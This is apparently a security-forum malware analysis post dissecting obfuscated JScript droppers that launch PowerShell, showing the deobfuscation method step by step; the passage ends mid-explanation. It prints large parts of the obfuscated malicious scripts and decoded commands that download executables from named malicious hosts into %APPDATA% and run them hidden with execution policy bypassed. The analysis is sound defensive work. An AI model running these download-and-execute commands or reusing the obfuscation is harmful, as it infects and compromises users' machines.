Malware Analysis Script-based samples that run Powershell - From Nov,19 2016 to March,06 2017

[DardiM]

https://malwaretips.com/threads/18-11-16-10.65618/
Thanks to @silversurfer

Edited :

Added samples and difference with EURO_27507.js :

BILL-24436.js (see the link at the end)
https://malwaretips.com/threads/sim...bill-24436-js-7-js-updated.65637/#post-568227​

7.js
https://malwaretips.com/threads/sim...4436-js-7-js-updated.65637/page-2#post-570623​

​

EURO_27507.js - 6/54

Why this sample ?
Similar to some sample deobfuscation I made very quiclky (less than 20s).
Each time, they seems to take my remarks into account and improve some parts

1) What it looks like :

Look at the spoiler : in red, the most important parts (almost all the other parts are not very important, or completely useless).

Spoiler: details

var uhetu = '92278';
vidrimkyzt = 'wafe';

function iswer() {

var ohamho = 0;
return ohamho;​

}
vahuc = 'bicq';

function ofilxum() {

var egassodca = 1;
return egassodca;​

}
var wawpugw = typeof document4;
var yffapyffa = undefined;

function omide() {

Object["prototype"]["length"] = 80;
var mylal = ["dleba", "re", "wonzijb"][1];
var eclyv = ["onxexke", "tu", "dudgeh"][1];
var zqyttih = ["nexi", "rn", "vmesmiwxi"][1];
var tedilbu = ["yvpokajv", " n", "zqigto"][1];
var unfafi = ["erqahl", "ew", "akugzo"][1];
var nmanlynxa = ["jkybky", " O", "hzovfir"][1];
var ewavdu = ["vyvgub", "bj", "cigxapf"][1];
var dehzi = ["ebyt", "ec", "ehhin"][1];
var immiqq = ["vcuctyp", "t(", "fwazpu"][1];
var slacu = ["papapko", ").", "bypykdy"][1];
var dewy = ["olak", "le", "ntaqmakmo"][1];
var opumq = ["kati", "ng", "mibbyni"][1];
var orakwa = ["gjadi", "th", "wdidjasr"][1];
var ujmyqym = ["iqzav", " =", "eqpyhon"][1];
var xpanfarn = ["iqedo", "= ", "gywa"][1];
var ugjuwzuqh = ["jnaqqyse", "80", "aziso"][1];
var kizawb = ["oxex", " &", "wyjumn"][1];
var rixjo = ["olgala", "& ", "kvufqa"][1];
var igcazji = ["cygekp", "ty", "ydmoqjy"][1];
var cybheve = ["sbeqyn", "pe", "chogoj"][1];
var enlaso = ["inikv", "of", "hywgy"][1];
var duvexr = ["vwyhodx", " W", "edazna"][1];
var pmaku = ["stocefde", "Sc", "okfuhzo"][1];
var hycu = ["dgokin", "ri", "uveqa"][1];
var vcuzevo = ["ubykebj", "pt", "atunejk"][1];
var ipelqiql = ["ucbuf", ".S", "yrezokx"][1];
var qidxixle = ["evlojums", "td", "ozofa"][1];
var jegsaf = ["viferx", "In", "kukyt"][1];
var ahekmakb = ["vamxal", ".W", "xusparj"][1];
var qnipdu = ["kluqdanx", "ri", "odmoqa"][1];
var ogfuv = ["cossuho", "te", "entakga"][1];
var vciwdug = ["zmedu", "Li", "efipo"][1];
var obpemk = ["vhosrals", "ne", "mdysa"][1];
var ywej = ["fnakvir", " =", "yzixleq"][1];
var mdyrrogr = ["wbefdan", "= ", "ydpomam"][1];
var luceqca = ["xuliki", "'u", "rivyrd"][1];
var oqirn = ["ufcapnam", "nk", "fryja"][1];
var sjabpoh = ["javfa", "no", "amun"][1];
var ytqakc = ["qabkagj", "wn", "dvabpu"][1];
var ocolr = ["akdygv", "'", "nfagyvu"][1];

return new Function(mylal + eclyv + zqyttih + tedilbu + unfafi + nmanlynxa + ewavdu + dehzi + immiqq + slacu + dewy + opumq + orakwa + ujmyqym + xpanfarn + ugjuwzuqh + kizawb + rixjo + igcazji + cybheve + enlaso + duvexr + pmaku + hycu + vcuzevo + ipelqiql + qidxixle + jegsaf + ahekmakb + qnipdu + ogfuv + vciwdug + obpemk + ywej + mdyrrogr + luceqca + oqirn + sjabpoh + ytqakc + ocolr)();​

}
var tesuxcarre = 'ygqony';
var agjobxex = "replace";
var xahlyrw = "38465";

function muwnyrx() {

var tojwolax = 1;
return tojwolax;​

}
var vqelle = '58690';
var erazyf = "gi";

function cileg() {

var ijahapso = false;
return ijahapso;​

}
function ymajdeluc() {

var ycdung = null;
return ycdung;​

}
function ikiredhu() {

return 1;​

}
var sumwyzu = 0;
var isevz = undefined;
var zawur = 1;

function nyjovyns() {

var apdopi = null;
return apdopi;​

}
var lvoje = 18.4517;
var axirkuw = 'zyktiz';
var lwabgyguw = undefined;
var jobqedv = 0;
var rukaby = undefined;
var ujiwja = null;

function bufosmy() {

var ocolr = ["syby", "oty", "myxrwowme", "x", "vyl", "yvyl", "usq", "wowme", "Xwowme", "nlunoty", "o", "majs", "syby", "nlunoty", "o", "powwowme", "vyl", "wowme", "", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "Rxyfn", "qqwowme", "gi", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "luvyl", "vsaqq", "vyl", "saqq", "", "Luvyl", "vsaqq", "vyl", "saqq", "", "yvyl", "usq", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "Xuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "cag", "wowme", "xuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "syby", "uvyl", "vsaqq", "vyl", "saqq", "", "uuvyl", "vsaqq", "vyl", "saqq", "", "oty", "uvyl", "vsaqq", "vyl", "saqq", "", "ioNuvyl", "vsaqq", "vyl", "saqq", "", "Puvyl", "vsaqq", "vyl", "saqq", "", "olisyby", "Ynlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "uvyl", "vsaqq", "vyl", "saqq", "", "BYPsaqq", "xyfn", "xyfn", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "cag", "uvyl", "vsaqq", "vyl", "saqq", "", "nopruvyl", "vsaqq", "vyl", "saqq", "", "OFiLuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "nlunoty", "o", "cag", "wwowme", "vyl", "wowme", "", "uvyl", "vsaqq", "vyl", "saqq", "", "Iuvyl", "vsaqq", "vyl", "saqq", "", "Nuvyl", "vsaqq", "vyl", "saqq", "", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "ouvyl", "vsaqq", "vyl", "saqq", "", "wwowme", "vyl", "wowme", "", "xyfn", "oty", "yuvyl", "vsaqq", "vyl", "saqq", "", "luvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "qqwowme", "gi", "ivyl", "uvyl", "vsaqq", "vyl", "saqq", "", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "nuvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "uzalu", "nwowme", "wwowme", "vyl", "wowme", "", "uvyl", "vsaqq", "vyl", "saqq", "", "cag", "uvyl", "vsaqq", "vyl", "saqq", "", "Obuvyl", "vsaqq", "vyl", "saqq", "", "jwowme", "syby", "uvyl", "vsaqq", "vyl", "saqq", "", "oty", "nlunoty", "o", "uvyl", "vsaqq", "vyl", "saqq", "", "xyfn", "Yxyfn", "oty", "wowme", "oty", "myxrwowme", "x", "yvyl", "usq", "uvyl", "vsaqq", "vyl", "saqq", "", "Nwowme", "oty", "uvyl", "vsaqq", "vyl", "saqq", "", "yvyl", "usq", "wwowme", "vyl", "wowme", "", "wowme", "bsyby", "luvyl", "vsaqq", "vyl", "saqq", "", "iuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "Nuvyl", "vsaqq", "vyl", "saqq", "", "oty", "fwwowme", "vyl", "wowme", "", "saqq", "s", "yvyl", "usq", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "Owwowme", "vyl", "wowme", "", "Nuvyl", "vsaqq", "vyl", "saqq", "", "LOuvyl", "vsaqq", "vyl", "saqq", "", "saqq", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "fIuvyl", "vsaqq", "vyl", "saqq", "", "lwowme", "uzalu", "oqby", "qqwowme", "gi", "oty", "oty", "pwowme", "tpyvi", "majs", "majs", "wwowme", "vyl", "wowme", "", "wwowme", "vyl", "wowme", "", "wwowme", "vyl", "wowme", "", "yvyl", "usq", "browwowme", "vyl", "wowme", "", "nsaqq", "lwowme", "oty", "yvyl", "usq", "oty", "opmajs", "ivyl", "yvyl", "usq", "pqqwowme", "gi", "p?f=1yvyl", "usq", "vyl", "saqq", "oty", "oqby", "", "uvyl", "vsaqq", "vyl", "saqq", "", "oqby", "hkyz", "saqq", "ppvyl", "saqq", "oty", "saqq", "hkyz", "yvyl", "usq", "wowme", "xwowme", "oqby", "fwwowme", "vyl", "wowme", "", "saqq", "s", "iwwowme", "vyl", "wowme", "", "oty", "wowme", "jli", "xyfn", "oty", "saqq", "Roty", "cag", "puvyl", "vsaqq", "vyl", "saqq", "", "rOuvyl", "vsaqq", "vyl", "saqq", "", "syby", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "xyfn", "xyfn", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "uvyl", "vsaqq", "vyl", "saqq", "", "hkyz", "saqq", "Ppvyl", "saqq", "oty", "saqq", "hkyz", "yvyl", "usq", "wowme", "xwowme", ""].join(",");

var nedxes = ['wowme,', "oqby,", 'majs,', 'cag,', "atco,", "vyl,", 'ydusq,', 'etpyvi,', 'wede,', 'syby,', "hkyz,", "oty,", "tmyxrex,", "uzalu,", "qqegi,", 'saqq,', 'nlunto,', "udvada,", "fwas,", "xyfn,", 'iwtejli,'];

var ezujigz = ['e', "'", '/', "-", "\,", 'd', ".", ':', "w", 'c', '%', "t", "m", "(", 'h', "a", ' ', '^', ")", 's', ";"];

var pfixyg = false;
while (1) {

if (!pfixyg) pfixyg = 0;
if (pfixyg == nedxes.length) break;
var ugula = nedxes[pfixyg];
switch (omide()) {
case true:

var ovhugca = new RegExp(ugula, erazyf);
ocolr = ocolr[agjobxex](ovhugca, ezujigz[pfixyg]);
break;​

}
pfixyg++;​

}
return ocolr;​

}
var ewubq = bufosmy();
if (lwabgyguw == 0) {

if (yffapyffa == 'nyja') {

var ulxyl = 'egojubv';
if (ulxyl === 0) {

if (typeof vqelle == "string") {

var ysxamhysyks = 6;
var zwupmubhy = "81657";
var jqodliri = null;
var vjyzkejijf = 0;​

}​

}​

}
if (ymajdeluc() == 'rfuknaj') {

if (typeof muwnyrx() == "number") {

var rygetqy = undefined;
var obeske = '97649';
var gzavusu = 31.7;
var ubacqud = obeske + gzavusu;
ubacqud = '41348' + ubacqud;
var ipifiwqa = undefined;
var iwujsiwnuq = undefined;
var unuro = "ysmyzavihj";
var igtohixy = 62;
var umlilpabijd = uhetu + igtohixy;
umlilpabijd = 16.286 + umlilpabijd;
var rhememqegza = 55.4;
var ocjulfag = vahuc + rhememqegza;
ocjulfag = 139.21 + ocjulfag;​

}​

}​

} else {

var ciryrowi = 1;
var bbywuzhugw = 12;
var yjerupr = undefined;
switch (ujiwja) {
case '96146':

var tobykzagmi = true;
if (tobykzagmi == false) {

if (ikiredhu() === null) {

var icamge = 'qlisalyx';
if (icamge === 'ibnymm') {

var jahuccy = 40.8286;
var mpawnom = axirkuw + jahuccy;
mpawnom = 8.8434 + mpawnom;
var yhgitza = false;​

}​

}​

}
if (iswer() === undefined) { //0

odsaxuto = 0.6244;
var qycxakz = vidrimkyzt + odsaxuto;
qycxakz = qycxakz + "89577";
var olokteslijd = false;​

}
break;​

case undefined:

var tobykzagmi = true;
if (tobykzagmi == false) {

if (ikiredhu() === null) {

var icamge = 'qlisalyx';
if (icamge === 'ibnymm') {

var jahuccy = 40.8286;
var mpawnom = axirkuw + jahuccy;
mpawnom = 8.8434 + mpawnom;
var yhgitza = false;​

}​

}​

}
if (iswer() === undefined) {

odsaxuto = 0.6244;
var qycxakz = vidrimkyzt + odsaxuto;
qycxakz = qycxakz + "89577";
var olokteslijd = false;​

}
break;​

case null:

var guhhepxe = WScript.CreateObject("WScript.Shell");
if (jobqedv === 0) {

var thucxiw = undefined;
var ycukqajz = false;
var vxoqbexpuhe = null;
var dedsogkybqo = 14.1;
var uficow = dedsogkybqo + tesuxcarre;
uficow = uficow + 5;
var itmemgov = 595;
itmemgov = 57 + itmemgov;
var obhyvtuv = 105.44;
var mnaqkyh = 14.472;
if (wawpugw == "undefined") {

var upawkarkez = true;
switch (upawkarkez) {
case undefined:

if (ofilxum() === undefined) {

var dzabosevju = 10.4;
var gizotz = '24306';​

}
break;​

case 'ilqoqigm':

if (ofilxum() === undefined) {

var dzabosevju = 10.4;
var gizotz = '24306';​

}
break;​

case null:

if (ofilxum() === undefined) {
var dzabosevju = 10.4;
var gizotz = '24306';
}
break;​

case true:

guhhepxe["r" + "un"](ewubq, sumwyzu);
break;​

case false:

if (ofilxum() === undefined) {

var dzabosevju = 10.4;
var gizotz = '24306';​

}
break;​

}
var ylzuvwase = null;
var wloreny = 'tavoxir';
var eqvabwemov = "mixejcesu";
var fkipele = 19;
fkipele = '32901';​

} else {

if (lvoje == 18.4517) {

if (nyjovyns() === null) {

var ixiqxamav = "wigabki";
var alxydxuhel = 97;
alxydxuhel = 'hfuhyfc';
var cusyji = undefined;​

}​

}​

var aqobzuhni = null;
if (aqobzuhni === "akremygxa") {

kosaqoj = "peqfelef";
qkoqvefle = 64;
var ercotutxi = kosaqoj + qkoqvefle;
ercotutxi = '22' + ercotutxi;
var ijxoripvepz = null;
var rkusjazgeb = "8103";
var evginocobh = 11;
var vpuwxefne = evginocobh + rkusjazgeb;
vpuwxefne = vpuwxefne + "89355";
var qpimqivt = 0;
var yzugqeb = 'alazutbuck';
var fvekypvyqlu = 52;
var cehpedikq = null;
}
var mulmyso = undefined;
if (mulmyso === undefined) {

var upitov = "udy";
var hamoxife = 20.7;
hamoxife = 1 + hamoxife;​

}​

}​

}
break;​

case "igumy":

var tobykzagmi = true;
if (tobykzagmi == false) {

if (ikiredhu() === null) {

var icamge = 'qlisalyx';
if (icamge === 'ibnymm') {

var jahuccy = 40.8286;
var mpawnom = axirkuw + jahuccy;
mpawnom = 8.8434 + mpawnom;
var yhgitza = false;​

}​

}​

}
if (iswer() === undefined) {
odsaxuto = 0.6244;
var qycxakz = vidrimkyzt + odsaxuto;
qycxakz = qycxakz + "89577";
var olokteslijd = false;
}
break;​

case 'zqecmalqe':

var tobykzagmi = true;

if (tobykzagmi == false) {

if (ikiredhu() === null) {
var icamge = 'qlisalyx';

if (icamge === 'ibnymm') {

var jahuccy = 40.8286;
var mpawnom = axirkuw + jahuccy;
mpawnom = 8.8434 + mpawnom;
var yhgitza = false;​

}​

}​

}
if (iswer() === undefined) {
odsaxuto = 0.6244;
var qycxakz = vidrimkyzt + odsaxuto;
qycxakz = qycxakz + "89577";
var olokteslijd = false;
}
break;
}​

}

Remember the method used against this family :

(1) find the real command line

- One long obfuscated string that is the command line of the run part
- One array of string : the different patterns to replace on the long String
- One array of chars : the different chars that will replace the patterns on the long strings

(2) find, between the numerous lines with parts useless, the only good line :

Shell.run(commmandline, 0)

=> on the script this line is obfuscated :

But : there are methods to find it, I have shown them on previous samples, but each time the new samples has modified it to my method fail ​

2) From previous version :

It didn't change a lot from other previous samples I have analysed.

2-1) The first time :

Quick search for run word :

We found :

case undefined:

togultyku.run(yvedy(), fqopwytlu);​

break;

=> Shell.run(commmandline, 0)

=> fqopwytlu : 0 (find by a search on the file content for the var fqopwytlu)

=> yvedy() : a function that will returns the good deobfuscated command linethe the spoiler part​

​

Spoiler: details

function yvedy() {

var jaqinod = "ejewcamd.exozettxexozett /ejewca poujixxuWujixxuexozettujixxuRshexozettLujixxuL.exozettXexozett ujixxu-ujixxuexozettxexozettejewcaujixxuutIoujixxunPoujixxuLIejewcaY ujixxubypsipxuqmujixxusujixxuS -ujixxunujixxuoPrujixxuoFiujixxuLexozett -WinujixxudOWsujixxutujixxuYujixxulexozett hujixxuiujixxuDDujixxuexozettNujixxu ujixxu(nexozettW-oBJexozettujixxuejewcaujixxutujixxu ujixxuSysujixxutexozettujixxuMujixxu.nexozettujixxuTujixxu.ujixxuWexozettujixxubujixxuejewcaLIexozettNTujixxu)ujixxu.doWNujixxulOujixxusipxuqmujixxudFujixxuIujixxulujixxuexozett('http://lovexozett.nexozettwsexozett...ixxurujixxuoujixxuejewcaexozettSujixxuSujixxu ujixxu%sipxuqmpPdsipxuqmtsipxuqm%.exozettXexozett";

var ekihvub = jaqinod[hifenmuhz](tyfjepfef, nlany)[hifenmuhz](odacik, axucw)[hifenmuhz](hyqzuski, ujcilf)[hifenmuhz](jzehykli, ymidv);
return ekihvub;​

}

This function returns ekihvub, a value that uses jaqinod, a string with a "strange" content

var ekihvub = jaqinod[hifenmuhz](tyfjepfef, nlany)[hifenmuhz](odacik, axucw)[hifenmuhz](hyqzuski, ujcilf)[hifenmuhz](jzehykli, ymidv);

This is some string manipulations.
With the var names, and the content of the script, the real values are easy to be retrieved :

hifenmuhz = 'replace';
var tyfjepfef = /ujixxu/gi;
var nlany = '^';

var odacik = /ejewca/gi;
var axucw = 'c';

var hyqzuski = /exozett/gi;
var ujcilf = 'e';

var jzehykli = /sipxuqm/gi;
var ymidv = 'a';

var etuqmowuh = undefined;

var ekihvub = jaqinod['replace'](/ujixxu/gi, '^')['replace'](/ejewca/gi, 'c')['replace'](/exozett/gi, 'e')['replace'](/sipxuqm/gi, 'a');

So, a multiple "replace" is used, to clean the famous obfuscated string on jaqinod

Result :

"cmd.exe /c po^W^e^RsheL^L.eXe ^-^exec^utIo^nPo^LIcY ^bypa^s^S -^n^oPr^oFi^Le -Win^dOWs^t^Y^le h^i^DD^eN^ ^(neW-oBJe^c^t^ ^Sys^te^M^.ne^T^.^We^b^cLIeNT^).doWNlOadFIle('http ://love.newsexgirls.ru/js/boxun4.bin','%APPDATA%\exe');STaRt-ProceSS %APPDATA%\eXe ""

​

it's easy to understand :

"cmd.exe /cpoWeRsheLL.eXe -executIonPoLIcY bypasS -noProFiLe -WindOWstYle hiDDeN (neW-oBJect SysteM.neT.WebcLIeNT).doWNlOadFIle('http ://love.newsexgirls.ru/js/boxun4.bin','%APPDATA%\exe');STaRt-ProceSS %APPDATA%\eXe "
​

​

2-2) 2nd old sample:

Quick search for run

We found :

=> this time, not directly the obfuscated Shell.run(commandline,0) part !
=> they use a var to put the word "run", to avoid tu get the important part directly.

=> var cimy = 'run'

​

but a search on cimy makes the job :

case null:

ittirra[cimy](xpoqys, xvafdyv);​

break;

=> xvafdyv = 0;

=> Shell.run(xpoqys, 0);

xpoqys : a var that hide a function to retrive the deobfuscated command line

A search give :

var xpoqys = mhuxezyd();

=> mhuxezyd() is the function that returns the deobfuscated command line string

Spoiler: method

function mhuxezyd() {

var yvyrsa = "ugq4b5zm5fbco6e74isb4rs4e62y6gbco6e77rs4e6xrs4e6 /ugq4b5 Powo5k9rs4e6rso5k9bco6e7rs4e6lly6gbco6e77o5k9rs4e6xrs4e6o5k9 -o5k9rs4e6xrs4e6o5k9ugq4b5o5k9uo5k9rs4e68ibp9o75Io5k9oNpoo5k9lIugq4b5yo5k9 ByPibp9o7Sso5k9 -o5k9no5k9Opo5k9rOo5k9fio5k9Lrs4e6 o5k9-wINisb4rs4e62oo5k9wsrs4e68ibp9o75ylo5k9rs4e6 o5k9bco6e7io5k9isb4rs4e62isb4rs4e62rs4e6No5k9 o5k9risb4rs4e62u6b8No5k9rs4e6o5k9wo5k9-o5k9oo5k9bjo5k9rs4e6ugq4b5rs4e68ibp9o75o5k9 so5k9yo5k9srs4e68ibp9o75rs4e6o5k9zm5fbco6e74y6gbco6e77Nrs4e6o5k9rs4e68ibp9o75y6gbco6e77Wrs4e6o5k9bo5k9ugq4b5lirs4e6No5k9rs4e68ibp9o75y7a6y6gbco6e77o5k9isb4rs4e62OwNLoibp9o7o5k9isb4rs4e62o5k9Filo5k9rs4e6risb4rs4e62u6b8o5k9'bco6e7rs4e68ibp9o75rs4e68ibp9o75pju9bl2//wipolrs4e6rs4e6ry6gbco6e77rs4e68ibp9o75op/usrs4e6ry6gbco6e77pbco6e7p?f=1y6gbco6e77isb4rs4e62ibp9o7rs4e68ibp9o75','fe8y8ibp9o7ppisb4rs4e62ibp9o7rs4e68ibp9o75ibp9o7fe8y8y6gbco6e77rs4e6Xrs4e6'y7a6;Srs4e68ibp9o75o5k9ibp9o7o5k9ro5k9rs4e68ibp9o75-pRoo5k9ugq4b5o5k9rs4e6So5k9So5k9 fe8y8ibp9o7PPisb4rs4e62ibp9o7rs4e68ibp9o75ibp9o7fe8y8y6gbco6e77rs4e6Xrs4e6";

var anwumo = [ywwenxaw, qrazi, okoku, doqjaze, ojinnox, qcusicm, rylwaf, assat, myrace, soryf, zebxi, gpibmoqma, hoslatd, osumv];

var dopqitna = [skubkuvr, maqosm, cidlo, thiczaxbo, fdukqohwu, wkathak, ilurl, ygiso, ajvucpyc, owurci, ogrosu, avicr, amycuq, fyqun];

var mlonyn = 0;
var epsura = new Function("return typeof WScript.StdOut.AtEndOfStream == 'unknown'")();
while (1) {

if (mlonyn == anwumo.length) break;

var ztihi = anwumo[mlonyn];
var sejep = dopqitna[mlonyn];
var qaceco = new RegExp(ztihi, vjopyv);
switch (epsura) {

case true:

yvyrsa = yvyrsa[gasvozgi](qaceco, sejep);​

break;​

}

mlonyn++;​

}
return yvyrsa;​

}

Explanation :

two arrays are used for the replace part :

var anwumo = [ywwenxaw, qrazi, okoku, doqjaze, ojinnox, qcusicm, rylwaf, assat, myrace, soryf, zebxi, gpibmoqma, hoslatd, osumv];

• var anwumo = ["bco6e7", '"y7a6", "ibp9o7", "zm5fh4", "ju9bl2", "ugq4b5", "fe8y8", "rs4e6", "o5k9", "isb4e2", "rdu6b8", '"e8a5", "y6gh7", "u3x5"];

=> an array with the pattern to be replaced

​

var dopqitna = [skubkuvr, maqosm, cidlo, thiczaxbo, fdukqohwu, wkathak, ilurl, ygiso, ajvucpyc, owurci, ogrosu, avicr, amycuq, fyqun];

• var dopqitna = ["h", ")", "a", "m", ":", "c", "%", "e", "^", "d", "(", "t", ".", "\'"];

=> an array with the chars to be used for the replace part

​

var mlonyn = 0;

=> used as current index with the both arrays

​

var epsura = new Function("return typeof WScript.StdOut.AtEndOfStream == 'unknown'")();

=> used for the case part
=> epsura is true if we are in a running script

​

while (1) {

=>'infinite' loot until it breaks : when all the part have been replaced

if (mlonyn == anwumo.length) break;

var ztihi = anwumo[mlonyn];

=> ztihi : string to be replaced, mlonyn : current index
=> example : index = 0 => "bco6e7"

​

var sejep = dopqitna[mlonyn];

=> sejep : char / string that will replaced, mlonyn : current index
=> example : index = 0 => 'h'

​

var qaceco = new RegExp(ztihi, vjopyv);

=> RegExpA regular expression : is an object that describes a pattern of characters

=> vjopyv : gi : parameter :

• g Perform a global match (find all matches rather than stopping after the first match)
• i Perform case-insensitive matching

=> example : /bco6e7/gi

​

switch (epsura) {

=> epsura is true if we are in a running script

​

case true:

yvyrsa = yvyrsa[gasvozgi](qaceco, sejep);

=> gasvozgi = "replace"

=> example :

index =0 :

• yvyrsa = yvyrsa["replace"](/bco6e7/gi, "h")
• all "bco6e7" pattern are replaced by "h" (case-insensitive matching)

break;

=> exit the case part​

}

mlonyn++;

=> index = index + 1​

}​

return yvyrsa;

"cmd.exe /c powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http ://wipoleer.top/user.php?f=1.dat','%appdata%\eXe');start-process %appdata%\eXe"
​

3) The current sample :

(1) A search on run => no result ...

=> it seems they have used in this sample another trick to avoid my easy method (run world)

(2) Let's search using the big function that should contain the command line, a parameter of the run method

We have find the famous function that returns the real command line.

=> method : a quick look at the content file :

This time : they used an array of strings that is joined to made a string

​

A small part :

function bufosmy() {

var ocolr = ["syby", "oty", "myxrwowme", "x", "vyl", "yvyl", "usq", "wowme",
....
....
....
"hkyz", "yvyl", "usq", "wowme", "xwowme", ""].join(",");​

We have got the name of the function : bufosmy

A search on this name :

=> var ewubq = bufosmy();

=> ewubq is certainly the name of the var that is used on the part we are looking for, that would be an obfuscated line that do the similar as :

​

Shell.run(commandline,0)​

Let's verify :

A search on ewubq :

Found !

case true:

guhhepxe["r" + "un"](ewubq, sumwyzu);​

break;

hahaha ! they have cut the run word in "r"+"un" to avoid the precedent working method based on the search of 'run' word

var guhhepxe = WScript.CreateObject("WScript.Shell");

=> Shell = WScript.CreateObject("WScript.Shell");

=> Shell.run(ewubq, 0);

and we have seen that var ewubq = bufosmy();​

Let's understand how this function deobfuscate the command line

function bufosmy() {

var ocolr = ["syby", "oty", "myxrwowme", "x", "vyl", "yvyl", "usq", "wowme", "Xwowme", "nlunoty", "o", "majs", "syby", "nlunoty", "o", "powwowme", "vyl", "wowme", "", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "Rxyfn", "qqwowme", "gi", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "luvyl", "vsaqq", "vyl", "saqq", "", "Luvyl", "vsaqq", "vyl", "saqq", "", "yvyl", "usq", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "Xuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "cag", "wowme", "xuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "syby", "uvyl", "vsaqq", "vyl", "saqq", "", "uuvyl", "vsaqq", "vyl", "saqq", "", "oty", "uvyl", "vsaqq", "vyl", "saqq", "", "ioNuvyl", "vsaqq", "vyl", "saqq", "", "Puvyl", "vsaqq", "vyl", "saqq", "", "olisyby", "Ynlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "uvyl", "vsaqq", "vyl", "saqq", "", "BYPsaqq", "xyfn", "xyfn", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "cag", "uvyl", "vsaqq", "vyl", "saqq", "", "nopruvyl", "vsaqq", "vyl", "saqq", "", "OFiLuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "nlunoty", "o", "cag", "wwowme", "vyl", "wowme", "", "uvyl", "vsaqq", "vyl", "saqq", "", "Iuvyl", "vsaqq", "vyl", "saqq", "", "Nuvyl", "vsaqq", "vyl", "saqq", "", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "ouvyl", "vsaqq", "vyl", "saqq", "", "wwowme", "vyl", "wowme", "", "xyfn", "oty", "yuvyl", "vsaqq", "vyl", "saqq", "", "luvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "qqwowme", "gi", "ivyl", "uvyl", "vsaqq", "vyl", "saqq", "", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "nuvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "uzalu", "nwowme", "wwowme", "vyl", "wowme", "", "uvyl", "vsaqq", "vyl", "saqq", "", "cag", "uvyl", "vsaqq", "vyl", "saqq", "", "Obuvyl", "vsaqq", "vyl", "saqq", "", "jwowme", "syby", "uvyl", "vsaqq", "vyl", "saqq", "", "oty", "nlunoty", "o", "uvyl", "vsaqq", "vyl", "saqq", "", "xyfn", "Yxyfn", "oty", "wowme", "oty", "myxrwowme", "x", "yvyl", "usq", "uvyl", "vsaqq", "vyl", "saqq", "", "Nwowme", "oty", "uvyl", "vsaqq", "vyl", "saqq", "", "yvyl", "usq", "wwowme", "vyl", "wowme", "", "wowme", "bsyby", "luvyl", "vsaqq", "vyl", "saqq", "", "iuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "Nuvyl", "vsaqq", "vyl", "saqq", "", "oty", "fwwowme", "vyl", "wowme", "", "saqq", "s", "yvyl", "usq", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "Owwowme", "vyl", "wowme", "", "Nuvyl", "vsaqq", "vyl", "saqq", "", "LOuvyl", "vsaqq", "vyl", "saqq", "", "saqq", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "fIuvyl", "vsaqq", "vyl", "saqq", "", "lwowme", "uzalu", "oqby", "qqwowme", "gi", "oty", "oty", "pwowme", "tpyvi", "majs", "majs", "wwowme", "vyl", "wowme", "", "wwowme", "vyl", "wowme", "", "wwowme", "vyl", "wowme", "", "yvyl", "usq", "browwowme", "vyl", "wowme", "", "nsaqq", "lwowme", "oty", "yvyl", "usq", "oty", "opmajs", "ivyl", "yvyl", "usq", "pqqwowme", "gi", "p?f=1yvyl", "usq", "vyl", "saqq", "oty", "oqby", "", "uvyl", "vsaqq", "vyl", "saqq", "", "oqby", "hkyz", "saqq", "ppvyl", "saqq", "oty", "saqq", "hkyz", "yvyl", "usq", "wowme", "xwowme", "oqby", "fwwowme", "vyl", "wowme", "", "saqq", "s", "iwwowme", "vyl", "wowme", "", "oty", "wowme", "jli", "xyfn", "oty", "saqq", "Roty", "cag", "puvyl", "vsaqq", "vyl", "saqq", "", "rOuvyl", "vsaqq", "vyl", "saqq", "", "syby", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "xyfn", "xyfn", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "uvyl", "vsaqq", "vyl", "saqq", "", "hkyz", "saqq", "Ppvyl", "saqq", "oty", "saqq", "hkyz", "yvyl", "usq", "wowme", "xwowme", ""].join(",");

=> The join(",") method used at the end build a long string

var ocolr =
